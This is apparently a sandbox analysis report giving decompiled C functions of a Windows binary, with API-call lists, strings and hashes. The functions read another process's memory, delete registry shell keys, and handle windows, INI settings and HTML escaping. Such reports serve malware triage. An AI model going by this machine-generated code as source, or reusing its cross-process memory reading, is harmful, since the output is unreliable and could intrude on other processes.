                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                          			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                          				void _v538;
                                                                                                                                                                                                                          				char _v540;
                                                                                                                                                                                                                          				int _v548;
                                                                                                                                                                                                                          				char _v564;
                                                                                                                                                                                                                          				char _v22292;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                          				long _t69;
                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t67 = __edx;
                                                                                                                                                                                                                          				E0040B550(0x5714, __ecx);
                                                                                                                                                                                                                          				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                                                                                                                                          				_t82 = _t37;
                                                                                                                                                                                                                          				_a16 = _t37;
                                                                                                                                                                                                                          				if(_t37 == 0) {
                                                                                                                                                                                                                          					_t69 = GetLastError();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t72 =  &_v22292;
                                                                                                                                                                                                                          					E0040171F(_t72, _t82);
                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                          					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
                                                                                                                                                                                                                          						_t69 = GetLastError();
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t48 = E00405642( &_v564);
                                                                                                                                                                                                                          						_t74 = _v548;
                                                                                                                                                                                                                          						_t70 = _t48;
                                                                                                                                                                                                                          						_a12 = _t74;
                                                                                                                                                                                                                          						_v540 = 0;
                                                                                                                                                                                                                          						memset( &_v538, 0, 0x1fe);
                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                          						_push(_t67);
                                                                                                                                                                                                                          						_push(_t74);
                                                                                                                                                                                                                          						_push(_t70);
                                                                                                                                                                                                                          						_push(L"%d  %I64x");
                                                                                                                                                                                                                          						_push(0xff);
                                                                                                                                                                                                                          						_push( &_v540);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_v548 = 0;
                                                                                                                                                                                                                          						E004055D1( &_v540,  &_v564);
                                                                                                                                                                                                                          						_t16 = _t70 + 0xa; // 0xa
                                                                                                                                                                                                                          						_t68 = _t16;
                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                          						_v16 = 0x100;
                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                          						E0040559A( &_v28, _t16);
                                                                                                                                                                                                                          						_t76 = _v12;
                                                                                                                                                                                                                          						_t56 = 0x40c4e8;
                                                                                                                                                                                                                          						if(_t76 != 0) {
                                                                                                                                                                                                                          							_t56 = _t76;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t26 = _t70 + 2; // 0x2
                                                                                                                                                                                                                          						_t66 = _t70 + _t26;
                                                                                                                                                                                                                          						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
                                                                                                                                                                                                                          						_t85 = _t76;
                                                                                                                                                                                                                          						if(_t76 == 0) {
                                                                                                                                                                                                                          							_t76 = 0x40c4e8;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                                                                                                                                          						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
                                                                                                                                                                                                                          						E004055D1(_t61,  &_v28);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					E004055D1(CloseHandle(_a16),  &_v564);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t69;
                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401B4A
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                            • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %d %I64x
                                                                                                                                                                                                                          • API String ID: 2567117392-2565891505
                                                                                                                                                                                                                          • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                                                                                                                          • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                                          			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				void _v2054;
                                                                                                                                                                                                                          				short _v2056;
                                                                                                                                                                                                                          				void _v4102;
                                                                                                                                                                                                                          				short _v4104;
                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x1004, __ecx);
                                                                                                                                                                                                                          				_t36 = 0;
                                                                                                                                                                                                                          				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                                                                                                                                          					_v2056 = 0;
                                                                                                                                                                                                                          					memset( &_v2054, 0, 0x7fe);
                                                                                                                                                                                                                          					_v4104 = 0;
                                                                                                                                                                                                                          					memset( &_v4102, 0, 0x7fe);
                                                                                                                                                                                                                          					_t34 = __ebx + 0x20a;
                                                                                                                                                                                                                          					_push(_t34);
                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                          					_push(L"%s\\shell\\%s\\command");
                                                                                                                                                                                                                          					_push(0x3ff);
                                                                                                                                                                                                                          					_push( &_v2056);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_push(_t34);
                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                          					_push(L"%s\\shell\\%s");
                                                                                                                                                                                                                          					_push(0x3ff);
                                                                                                                                                                                                                          					_push( &_v4104);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                                                                                                                                          					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                                          					_t36 =  ~_t28 + 1;
                                                                                                                                                                                                                          					RegCloseKey(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t36;
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Delete_snwprintfmemset$Close
                                                                                                                                                                                                                          • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                                                                                                                          • API String ID: 1018939227-3575174989
                                                                                                                                                                                                                          • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040313D(void* __ecx) {
                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				struct HWND__* _t6;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t11;
                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v12 = 8;
                                                                                                                                                                                                                          				_v8 = 0xff;
                                                                                                                                                                                                                          				_t15 = 0;
                                                                                                                                                                                                                          				_t20 = 0;
                                                                                                                                                                                                                          				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                                                                                                                          				if(_t23 == 0) {
                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                          					__imp__#17();
                                                                                                                                                                                                                          					_t6 = 1;
                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                          					if(_t6 != 0) {
                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                                                                                                                          				if(_t11 != 0) {
                                                                                                                                                                                                                          					_t20 = 1;
                                                                                                                                                                                                                          					_t15 =  *_t11( &_v12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				FreeLibrary(_t23);
                                                                                                                                                                                                                          				if(_t20 == 0) {
                                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t6 = _t15;
                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                                                                          • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                          • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                                                                          				struct HWND__* _v8;
                                                                                                                                                                                                                          				struct HWND__* _v12;
                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                          				struct tagRECT _v44;
                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                          				long _t61;
                                                                                                                                                                                                                          				struct HDC__* _t63;
                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                          				struct HWND__* _t71;
                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                          				int _t74;
                                                                                                                                                                                                                          				int _t80;
                                                                                                                                                                                                                          				int _t83;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t73 = __edx;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				_t74 = GetSystemMetrics(0x11);
                                                                                                                                                                                                                          				_t80 = GetSystemMetrics(0x10);
                                                                                                                                                                                                                          				if(_t74 == 0 || _t80 == 0) {
                                                                                                                                                                                                                          					_t63 = GetDC(0);
                                                                                                                                                                                                                          					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                                                                                                                          					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                                                                                                                          					ReleaseDC(0, _t63);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				GetWindowRect(_a4,  &_v44);
                                                                                                                                                                                                                          				if((_a8 & 0x00000004) != 0) {
                                                                                                                                                                                                                          					_t71 = GetParent(_a4);
                                                                                                                                                                                                                          					if(_t71 != 0) {
                                                                                                                                                                                                                          						_v28.left = _v28.left & 0x00000000;
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						GetWindowRect(_t71,  &_v28);
                                                                                                                                                                                                                          						_t61 = _v28.left;
                                                                                                                                                                                                                          						_t72 = _v28.top;
                                                                                                                                                                                                                          						_t80 = _v28.right - _t61 + 1;
                                                                                                                                                                                                                          						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                                                                                                                          						_v8 = _t61;
                                                                                                                                                                                                                          						_v12 = _t72;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t65 = _v44.right;
                                                                                                                                                                                                                          				if((_a8 & 0x00000001) == 0) {
                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                          					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t83 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t68 = _v44.bottom;
                                                                                                                                                                                                                          				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                          					_t50 = 0;
                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                          					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                                                                                                                          					if(_t50 >= 0) {
                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                          						if(_t83 < 0) {
                                                                                                                                                                                                                          							_t83 = 0;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E07
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00404E12
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                                                          • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                                          			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                                          				int _t6;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t3 = E00404AAA(_a4);
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					wcscpy(0x40fb90, _a4);
                                                                                                                                                                                                                          					wcscpy(0x40fda0, L"general");
                                                                                                                                                                                                                          					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                          					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                                                                                                                                          					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                                                                                                                                          					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                                                                                                                                          					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t3;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063B2
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063C2
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                                                                                                                            • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                          • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                                          				signed short* _t3;
                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t3 = __eax;
                                                                                                                                                                                                                          				_t8 = __ecx;
                                                                                                                                                                                                                          				_t7 = 8;
                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                          					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                                                                                                                          					if(_t2 != 0x3c) {
                                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push(_t7);
                                                                                                                                                                                                                          					_push(L"&lt;");
                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                          					_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                                                                                          					_t10 = _t10 + 0xc;
                                                                                                                                                                                                                          					_t8 = _t8 + _t7;
                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                          					if( *_t3 != 0) {
                                                                                                                                                                                                                          						_t3 =  &(_t3[1]);
                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                          					if(_t2 != 0x3e) {
                                                                                                                                                                                                                          						if(_t2 != 0x22) {
                                                                                                                                                                                                                          							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                                                                                                                          								if(_t2 != 0x26) {
                                                                                                                                                                                                                          									if(_t2 != 0xa) {
                                                                                                                                                                                                                          										 *_t8 = _t2;
                                                                                                                                                                                                                          										_t8 = _t8 + 2;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_push(_t7);
                                                                                                                                                                                                                          										_push(L"<br>");
                                                                                                                                                                                                                          										goto L14;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_push(0xa);
                                                                                                                                                                                                                          									_push(L"&amp;");
                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_push(0xa);
                                                                                                                                                                                                                          								_push(L"&deg;");
                                                                                                                                                                                                                          								L11:
                                                                                                                                                                                                                          								_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                                                                                          								_t10 = _t10 + 0xc;
                                                                                                                                                                                                                          								_t8 = _t8 + 0xa;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                                                                                                                          							_t10 = _t10 + 0xc;
                                                                                                                                                                                                                          							_t8 = _t8 + 0xc;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_push(_t7);
                                                                                                                                                                                                                          						_push(L"&gt;");
                                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                          • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
